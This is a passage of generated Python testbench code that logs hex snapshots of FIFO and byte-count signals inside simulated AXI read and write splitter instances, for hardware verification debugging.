logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split11.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split11.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split110.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split110.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split110.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split110.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split110.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split110.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split110.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split110.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split110.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split110.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split110.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split110.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split111.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split111.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split111.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split111.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split111.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split111.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split111.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split111.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split111.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split111.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split111.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split111.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split112.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split112.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split112.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split112.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split112.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split112.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split112.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split112.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split112.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split112.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split112.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split112.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split113.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split113.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split113.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split113.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split113.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split113.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split113.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split113.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split113.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split113.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split113.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split113.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split114.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split114.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split114.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split114.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split114.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split114.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split114.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split114.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split114.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split114.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split114.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split114.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split115.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split115.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split115.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split115.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split115.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split115.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split115.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split115.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split115.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split115.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.back_bid_d_fifo.count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.back_bid_d_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.back_bid_d_fifo.int_count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.back_bid_d_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.order_fifo.next_count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.order_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.order_fifo.count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.order_fifo.count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.w_fifo.next_count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.w_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split115.axi_wr_4_splitter.w_fifo.count" % logs.peek("tb.dut.split115.axi_wr_4_splitter.w_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_rd_4_splitter.ar_fifo.next_count" % logs.peek("tb.dut.split12.axi_rd_4_splitter.ar_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split12.axi_rd_4_splitter.ar_fifo.count" % logs.peek("tb.dut.split12.axi_rd_4_splitter.ar_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_rd_4_splitter.r_fifo.next_count" % logs.peek("tb.dut.split12.axi_rd_4_splitter.r_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split12.axi_rd_4_splitter.r_fifo.count" % logs.peek("tb.dut.split12.axi_rd_4_splitter.r_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.a_bcount" % logs.peek("tb.dut.split12.axi_wr_4_splitter.a_bcount"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.b_bcount" % logs.peek("tb.dut.split12.axi_wr_4_splitter.b_bcount"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.c_bcount" % logs.peek("tb.dut.split12.axi_wr_4_splitter.c_bcount"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.d_bcount" % logs.peek("tb.dut.split12.axi_wr_4_splitter.d_bcount"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.aw_fifo.next_count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.aw_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.aw_fifo.count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.aw_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.b_fifo.next_count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.b_fifo.count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.b_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.back_bid_a_fifo.count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.back_bid_a_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.back_bid_a_fifo.int_count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.back_bid_a_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.back_bid_b_fifo.count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.back_bid_b_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.back_bid_b_fifo.int_count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.back_bid_b_fifo.int_count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.back_bid_c_fifo.count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.back_bid_c_fifo.count"))
logs.log_info("SNP %x tb.dut.split12.axi_wr_4_splitter.back_bid_c_fifo.int_count" % logs.peek("tb.dut.split12.axi_wr_4_splitter.back_bid_c_fifo.int_count"))
